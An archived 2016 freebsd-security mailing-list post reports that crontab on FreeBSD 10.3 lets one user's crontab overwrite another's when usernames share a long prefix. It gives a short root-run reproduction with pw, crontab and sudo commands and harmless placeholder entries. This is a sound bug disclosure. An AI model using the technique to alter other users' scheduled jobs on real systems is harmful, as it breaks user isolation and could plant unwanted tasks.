Date: Thu, 1 Sep 2016 14:47:26 +0200 From: Andrii Kuzik <akuzik@gmail.com> To: freebsd-security@freebsd.org Subject: edit others user crontab, security bug Message-ID: <CA%2Bf9Cbu8q2KngxgAmZ8BrKYyYC5okDcMAs4nd=SJS6YpBMRJcQ@mail.gmail.com>
next in thread | raw e-mail | index | archive | help
Probably a lot of freebsd servers affected Security bug allows to edit other users crontab root# pw useradd -n www.promspecbud.com -g nobody -s /bin/sh -d /tmp root# pw useradd -n www.promspecbud.com.other -g nobody -s /bin/sh -d /tmp root# echo @daily doit baby > /tmp/test root# crontab -u www.promspecbud.com.other /tmp/test root# crontab -u www.promspecbud.com -l =====output ===== @daily doit baby ================= root#echo @daily doit baby one more time>> /tmp/test root#sudo -u www.promspecbud.com.other crontab /tmp/test root#sudo -u www.promspecbud.com crontab -l =====output ===== @daily doit baby @daily doit baby one more time ================= root# uname -a FreeBSD kuzik 10.3-RELEASE FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 02:10:02 UTC 2016 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64 best regards, Andrii Kuzik
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?CA%2Bf9Cbu8q2KngxgAmZ8BrKYyYC5okDcMAs4nd=SJS6YpBMRJcQ>